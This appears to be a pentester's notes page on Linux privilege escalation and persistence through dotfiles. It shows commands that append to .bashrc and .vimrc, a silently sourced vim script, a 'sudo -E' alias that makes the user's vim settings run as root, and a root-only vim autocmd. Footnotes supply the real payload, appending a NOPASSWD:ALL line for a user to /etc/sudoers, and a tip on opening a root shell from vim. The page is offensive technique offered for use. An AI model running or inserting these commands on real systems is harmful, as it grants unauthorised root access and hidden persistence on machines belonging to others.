# Linux

{% embed url="<https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/>" %}

## dotfiles .xxx

{% hint style="info" %}
Applications frequently store user-specific configuration files and subdirectories within a user's home directory, typically only writable by the user themselves or *root.*
{% endhint %}

### /bin/bash

`.bash_profile` is executed when logging in to the system initially. This happens when logging in to the machine itself, via a serial console or SSH.&#x20;

`.bashrc` is executed when a new terminal window is opened from an existing login session or when a new shell instance is started from an existing login session.

We can modify `.bash_profile` or `.bashrc` to set environment variables or load scripts when a user initially logs in to a system. Can be useful when trying to maintain persistence, and escalate privileges... e.g. `echo "touch /tmp/bashtest.txt" >> ~/.bashrc`

### VIM

#### Unrestricted VIM environment -

{% code title="a) ! can exec shell cmd" %}

```bash
echo "!touch /tmp/test.txt" >> ~/.vimrc
```

{% endcode %}

<pre class="language-bash" data-title="b) stealthier"><code class="lang-bash"><strong>echo "#!/bin/bash" >> ~/.vimrunscript
</strong><strong>echo '<a data-footnote-ref href="#user-content-fn-1">echo "hacked" > /tmp/hacksrcout.txt</a>' >> ~/.vimrunscript
</strong><strong>
</strong><strong>echo ":silent !source ~/.vimrunscript" >> ~/.vimrc
</strong></code></pre>

```bash
sudo vi
```

{% hint style="warning" %}
VIM handles its configuration files differently for a user in a sudo context depending on the distribution of Linux.

*Ubuntu* and *Red Hat*, VIM will use the current user's .vimrc configuration file even in a sudo context. <mark style="background-color:green;">**(if the user runs VIM via**</mark><mark style="background-color:green;">**&#x20;**</mark><mark style="background-color:green;">**`sudo`**</mark><mark style="background-color:green;">**, our script being sourced will also run as**</mark><mark style="background-color:green;">**&#x20;**</mark>*<mark style="background-color:green;">**root)**</mark>*

In other distributions, such as *Debian*, in a sudo context, VIM will use the *root* user's VIM configuration. <mark style="background-color:green;">**We can add an**</mark><mark style="background-color:green;">**&#x20;**</mark>*<mark style="background-color:green;">**alias**</mark>*<mark style="background-color:green;">**&#x20;**</mark><mark style="background-color:green;">**to the user's .bashrc file as below shows -**</mark>
{% endhint %}

#### In *Debian*

The `alias` replaces a standard `sudo` call with one that will force `sudo` to persist the user's VIM settings, so that the shell script being loaded will then also run as *root* when user runs VIM via `sudo`

```bash
echo 'alias sudo="sudo -E"' >> ~/.bashrc
```

{% code title="apply the change" %}

```bash
source ~/.bashrc
```

{% endcode %}

{% hint style="info" %}
If `sudo -l` shows `NOPASSWD` on vim command to open specific file, we can just run `su vi the_file` and use `:shell` directly to gain root shell without root password
{% endhint %}

{% hint style="info" %}
Note that many administrators now require the use of *sudoedit* for modifying sensitive files. This process makes copies of the files for the user to edit and then uses sudo to overwrite the old files. It also prevents the editor itself from running as sudo. Having said this, it is also not uncommon to find that system administrators simply add VIM to the allowed commands in the sudoers file instead.
{% endhint %}

#### Restricted VIM environment that blocks shell command -

<pre class="language-vim" data-title="~/.vim/plugin/settings.vim"><code class="lang-vim">:if $USER == "root"
:autocmd BufWritePost * :silent <a data-footnote-ref href="#user-content-fn-2">:w! >> /tmp/hackedfromvim.txt</a>
:endif
</code></pre>

[^1]: `echo "`*`user`*` ``ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers"`

[^2]: to run shell script/commands, prepend with ! mark -

    `!script1` / `!id`

    `!echo "`*`user`*` ``ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers"`